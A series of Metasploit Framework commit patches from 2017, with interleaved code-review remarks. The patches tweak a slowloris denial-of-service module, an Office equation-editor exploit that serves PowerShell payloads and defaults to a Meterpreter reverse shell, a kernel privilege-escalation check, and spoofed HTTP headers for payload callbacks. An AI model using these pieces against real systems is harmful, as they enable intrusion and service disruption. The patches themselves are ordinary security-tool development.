@@ -102,7 +108,7 @@ def run(args): module.log("Creating sockets...", 'info') for i in range(socket_count): try: - module.log("Creating socket number %s" % (i), 'debug') + module.log("Creating socket number %s" % i, 'debug') s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent) except socket.error: break @@ -112,7 +118,9 @@ def run(args): module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info') for s in list(list_of_sockets): try: - s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8")) + s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)), + random.randint(1, 5000)).encode("utf-8")) + except socket.error: list_of_sockets.remove(s) @@ -126,5 +134,6 @@ def run(args): break time.sleep(delay) + if __name__ == "__main__": module.run(metadata, run) From 81c6823b729062bb44e85180bfa4926be458a85c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 21 Nov 2017 17:50:53 -0600 Subject: [PATCH 200/254] handle interrupt and unknown exceptions properly with external modules --- lib/msf/core/module/external.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb index 5a6c1bf29d..4c08d5a4e2 100644 --- a/lib/msf/core/module/external.rb +++ b/lib/msf/core/module/external.rb @@ -17,9 +17,11 @@ module Msf::Module::External end end end - rescue Exception => e #Msf::Modules::External::Bridge::Error => e + rescue Interrupt => e + raise e + rescue Exception => e elog e.backtrace.join("\n") - fail_with Failure::UNKNOWN, e.message + fail_with Msf::Module::Failure::Unknown, e.message end end From db4c0fcca989162c12c1e811660cfb63f9083259 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 19:02:14 -0500 Subject: [PATCH 201/254] spelling --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
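Review bot: The `rescue Exception => e` line that follows the new `Interrupt` branch still catches `SystemExit`, `NoMemoryError` and the other `SignalException` subclasses and turns them into `fail_with`, so an `exit` raised inside the external-module bridge becomes a logged module failure instead of terminating; narrow it to `rescue StandardError => e` (what a bare `rescue` already means) or add those classes to the re-raise branch. In the `Interrupt` branch a bare `raise` is the idiom for re-raising the current exception, `rescue Interrupt` / `raise`, with no need to bind `e`. The `elog e.backtrace.join("\n")` call records only the backtrace, so the message and its location end up in separate places; logging `"#{e.class}: #{e.message}\n#{e.backtrace.join("\n")}"` keeps them together. The enclosing method begins outside the hunk.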
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 83995534f2..9592fbad75 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -171,12 +171,12 @@ class MetasploitModule < Msf::Exploit::Remote def on_request_uri(cli, _request) if _request.raw_uri =~ /\.sct$/ - print_status("Handling initial request from #{cli.peerhost}") + print_status("Handling request for .sct from #{cli.peerhost}") payload = gen_psh("#{get_uri}", "string") data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else - print_status("Stage two requested, sending...") + print_status("Delivering payload...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, From 275f70e77e9decfd42ca6d67be3ea840f67876e1 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 21 Nov 2017 19:34:04 -0500 Subject: [PATCH 202/254] better saving --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 9592fbad75..1e52fcc476 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote )) register_options([ - OptString.new("FILENAME", [true, "Filename to save as"]) + OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"]) ]) end 
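Review bot: `on_request_uri(cli, _request)` reads `_request.raw_uri` on the next line, but a leading underscore conventionally marks a parameter as unused (RuboCop's Lint/UnderscorePrefixedVariableName flags exactly this), so the name misleads readers; rename it, `def on_request_uri(cli, request)` / `if request.raw_uri =~ /\.sct$/`. `gen_psh("#{get_uri}", "string")` interpolates a value that is presumably already a string, so `gen_psh(get_uri, "string")` is equivalent. Both lines are context rather than part of this commit, and the method body continues past the hunk.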
@@ -134,10 +134,12 @@ class MetasploitModule < Msf::Exploit::Remote payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - ::File.open(datastore['FILENAME'], 'wb') do |fd| + path = ::File.join(Msf::Config.local_directory, datastore['FILENAME']) + ::File.open(path, 'wb') do |fd| fd.write(payload) fd.close end + print_good("Wrote payload to #{path}") end @@ -176,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote data = gen_sct_file(payload) send_response(cli, data, 'Content-Type' => 'text/plain') else - print_status("Delivering payload...") + print_status("Delivering payload to #{cli.peerhost}...") p = regenerate_payload(cli) data = cmd_psh_payload(p.encoded, payload_instance.arch.first, From 960893b99dca4f845cce067319c26d68b5914d8b Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Wed, 22 Nov 2017 06:36:46 -0500 Subject: [PATCH 203/254] change default payload --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 1e52fcc476..f87d1032fb 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } )) From ae43883e2b4c830fa9dbc49381d8b9fb0054a2ea Mon Sep 17 00:00:00 2001 From: attackdebris Date: Wed, 22 Nov 2017 08:03:12 -0500 Subject: [PATCH 204/254] Fix mongodb_login typo --- modules/auxiliary/scanner/mongodb/mongodb_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
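Review bot: `fd.close` inside the `::File.open(path, 'wb') do |fd|` block is redundant — the block form closes the handle on exit, including when `fd.write` raises — so the block body can be just `fd.write(payload)`. `datastore['FILENAME']` is joined onto `Msf::Config.local_directory` unchanged, so a value containing path separators or `..` writes outside that directory; if the intent is to keep output inside the local directory, join `::File.basename(datastore['FILENAME'])` instead, or use the `file_create` helper from `Msf::Exploit::FILEFORMAT` that other fileformat modules rely on for this (verify that this module includes that mixin). The enclosing method starts outside the hunk.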
diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index 532b649332..092258531f 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary :exploited_at => Time.now.utc, :info => "Mongo server has no authentication." ) - print_good("Mongo server #{ip.to_s} dosn't use authentication") + print_good("Mongo server #{ip.to_s} doesn't use authentication") end disconnect rescue ::Exception => e From 0d79a3a3e284a71805a3ac69f0fc32c2b7fc1d30 Mon Sep 17 00:00:00 2001 From: vipzen <7483228+vipzen@users.noreply.github.com> Date: Thu, 23 Nov 2017 08:35:55 -0200 Subject: [PATCH 205/254] Add support to Windows .NET Server --- modules/exploits/windows/local/ms10_015_kitrap0d.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index f195409a4f..c1152c0670 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local # Validate OS version winver = sysinfo["OS"] - unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/ + unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/ return Exploit::CheckCode::Safe end From c9da8f7a1857660fc2860eb3fe539ba045768785 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 24 Nov 2017 10:01:50 -0800 Subject: [PATCH 206/254] Bump version of framework to 4.16.20 --- Gemfile.lock | 6 +++--- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c20a197a6d..9f6cd73794 100644 --- a/Gemfile.lock +++ b/Gemfile.lock 
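Review bot: In the new alternative `Windows .NET Server` the `.` is an unescaped regex metacharacter, so it matches any single character rather than a literal dot; escape it, `unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows \.NET Server|Windows 2008|Windows 7/`. The practical effect is only a slightly looser match, but this regex is the gate that returns `Exploit::CheckCode::Safe` for every other OS string, so it should match exactly what it names. The enclosing method continues outside the hunk.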
@@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.19) + metasploit-framework (4.16.20) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -311,7 +311,7 @@ GEM rspec-mocks (3.7.0) diff-lcs (>= 1.2.0, < 2.0) rspec-support (~> 3.7.0) - rspec-rails (3.7.1) + rspec-rails (3.7.2) actionpack (>= 3.0) activesupport (>= 3.0) railties (>= 3.0) @@ -357,7 +357,7 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - yard (0.9.9) + yard (0.9.11) PLATFORMS ruby diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index cfde864472..7e90de291c 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.19" + VERSION = "4.16.20" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 8645a518b3f8a084512e01691e255ea19164b88a Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Fri, 24 Nov 2017 20:27:34 -0600 Subject: [PATCH 207/254] add mettle support for custom headers --- Gemfile.lock | 4 +-- lib/msf/base/sessions/mettle_config.rb | 25 +++++++++++++------ lib/msf/core/payload/transport_config.rb | 3 +++ metasploit-framework.gemspec | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../aarch64/meterpreter_reverse_https.rb | 2 +- .../linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../linux/armbe/meterpreter_reverse_http.rb | 2 +- .../linux/armbe/meterpreter_reverse_https.rb | 2 +- .../linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/armle/meterpreter_reverse_http.rb | 2 +- .../linux/armle/meterpreter_reverse_https.rb | 2 +- .../linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../linux/mips64/meterpreter_reverse_http.rb | 2 +- .../linux/mips64/meterpreter_reverse_https.rb | 2 +- .../linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc/meterpreter_reverse_http.rb | 2 +- .../linux/ppc/meterpreter_reverse_https.rb | 2 +- .../linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../ppc64le/meterpreter_reverse_https.rb | 2 +- .../linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../ppce500v2/meterpreter_reverse_http.rb | 2 +- .../ppce500v2/meterpreter_reverse_https.rb | 2 +- .../ppce500v2/meterpreter_reverse_tcp.rb | 2 +- .../linux/x64/meterpreter_reverse_http.rb | 2 +- .../linux/x64/meterpreter_reverse_https.rb | 2 +- .../linux/x64/meterpreter_reverse_tcp.rb | 2 +- .../linux/x86/meterpreter_reverse_http.rb | 2 +- .../linux/x86/meterpreter_reverse_https.rb | 2 +- .../linux/x86/meterpreter_reverse_tcp.rb | 2 +- 
.../linux/zarch/meterpreter_reverse_http.rb | 2 +- .../linux/zarch/meterpreter_reverse_https.rb | 2 +- .../linux/zarch/meterpreter_reverse_tcp.rb | 2 +- .../osx/x64/meterpreter_reverse_http.rb | 2 +- .../osx/x64/meterpreter_reverse_https.rb | 2 +- .../osx/x64/meterpreter_reverse_tcp.rb | 2 +- 43 files changed, 62 insertions(+), 50 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index f83e37305d..dfcf9d1632 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -19,7 +19,7 @@ PATH metasploit-model metasploit-payloads (= 1.3.15) metasploit_data_models - metasploit_payloads-mettle (= 0.2.5) + metasploit_payloads-mettle (= 0.2.8) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.5) + metasploit_payloads-mettle (0.2.8) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) diff --git a/lib/msf/base/sessions/mettle_config.rb b/lib/msf/base/sessions/mettle_config.rb index f135818614..369562a9c1 100644 --- a/lib/msf/base/sessions/mettle_config.rb +++ b/lib/msf/base/sessions/mettle_config.rb @@ -27,6 +27,10 @@ module Msf generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid]) end + def generate_uri_option(opts, opt) + opts[opt] ? "--#{opt} '#{opts[opt].gsub(/'/, "\\'")}' " : '' + end + def generate_http_uri(opts) if Rex::Socket.is_ipv6?(opts[:lhost]) target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" @@ -38,7 +42,15 @@ module Msf target_uri << opts[:lport].to_s target_uri << luri target_uri << generate_uri(opts) - target_uri + target_uri << '|' + target_uri << generate_uri_option(opts, :ua) + target_uri << generate_uri_option(opts, :host) + target_uri << generate_uri_option(opts, :referer) + if opts[:cookie] + opts[:header] = "Cookie: #{opts[:cookie]}" + target_uri << generate_uri_option(opts, :header) + end + target_uri.strip end def generate_tcp_uri(opts) 
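Review bot: In the new `generate_uri_option`, the replacement string `"\\'"` is the two characters `\'`, which `gsub` interprets as the post-match special replacement (the text after the match, like `$'`) rather than an escaped quote: `"a'b".gsub(/'/, "\\'")` yields `"abb"`. To emit a literal backslash-quote, double the backslash, `"\\\\'"`, or use the block form `gsub("'") { "\\'" }`, where no replacement syntax applies. Because the value is then wrapped in single quotes and spliced into the `|`-delimited option string built in the second hunk of this file (presumably parsed by the payload as shell-like options), a user-agent, host or header containing `'` currently produces a malformed option instead of an escaped one. That second hunk also makes `generate_http_uri` mutate its argument via `opts[:header] = "Cookie: #{opts[:cookie]}"`; building the header string in a local and passing it through would avoid the side effect on the caller's hash.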
@@ -57,14 +69,11 @@ module Msf case opts[:scheme] when 'http' - transport = transport_config_reverse_http(opts) - opts[:uri] = generate_http_uri(transport) + opts[:uri] = generate_http_uri(transport_config_reverse_http(opts)) when 'https' - transport = transport_config_reverse_https(opts) - opts[:uri] = generate_http_uri(transport) + opts[:uri] = generate_http_uri(transport_config_reverse_https(opts)) when 'tcp' - transport = transport_config_reverse_tcp(opts) - opts[:uri] = generate_tcp_uri(transport) + opts[:uri] = generate_tcp_uri(transport_config_reverse_tcp(opts)) else raise ArgumentError, "Unknown scheme: #{opts[:scheme]}" end @@ -74,7 +83,7 @@ module Msf unless opts[:stageless] == true guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') end - opts[:session_guid] = Base64.encode64(guid) + opts[:session_guid] = Base64.encode64(guid).strip opts.slice(:uuid, :session_guid, :uri, :debug, :log_file) end diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 7258561544..84e257bcce 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -66,6 +66,9 @@ module Msf::Payload::TransportConfig proxy_type: ds['HttpProxyType'], proxy_user: ds['HttpProxyUser'], proxy_pass: ds['HttpProxyPass'], + host: ds['HttpHostHeader'], + cookie: ds['HttpCookie'], + referer: ds['HttpReferer'], custom_headers: get_custom_headers(ds) }.merge(timeout_config(opts)) end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 594a372aa0..49feede5fa 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
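Review bot: `Base64.encode64(guid).strip` removes the trailing newline that `encode64` appends, but the standard library already has a variant that emits no line breaks: `opts[:session_guid] = Base64.strict_encode64(guid)`. It is also safer if the input ever grows, since `encode64` inserts interior newlines for longer inputs that `strip` would not remove. Visible in the context lines and not introduced here, `guid` is only assigned when `opts[:stageless]` is not `true`, so the stageless path would pass `nil` to `encode64`, which presumably raises a TypeError — confirm whether that path is reachable. The enclosing method starts outside the hunk.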
@@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.3.15' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.5' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 3a9e4e3e27..74c9255f11 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 692384 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index d5eda3afaf..b1c6ffcd4e 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 692384 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 3400e28e34..d6818b4eb2 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 692384 + CachedSize = 693880 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index bd32104cce..f44197a497 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 678568 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 073d4b31b3..6341bee2ae 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 678568 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index d2d13aedc0..634b6560ef 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 678568 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index e03945a404..cf5d0c6be7 100644 
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 677296 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index e31c66b376..ed339b08b0 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 677296 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 8bd8a3cc05..50080e27d1 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 677296 + CachedSize = 682608 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 10f36f74d8..5d755982a8 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1077640 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index e0beb782fe..d38aa97904 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1077640 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index c965638d7e..ea96d086d2 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1077640 + CachedSize = 1081096 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index d1749f9c25..8ab191d710 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bc1d3f2c08..b3aa33d864 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index cc021b9ff2..fce512c439 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1058488 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index a98f452a62..35b4a3ada0 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1053540 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 258bd4192f..e92e5319f3 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1053540 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 78b4d6b8d7..ab9bbd211b 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1053540 + CachedSize = 1058584 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 83aa882cc2..684af558e5 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 9b0c40b47f..92fad1845a 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 854692 + CachedSize = 856196 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 7832e02b38..5a607842fd 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb 
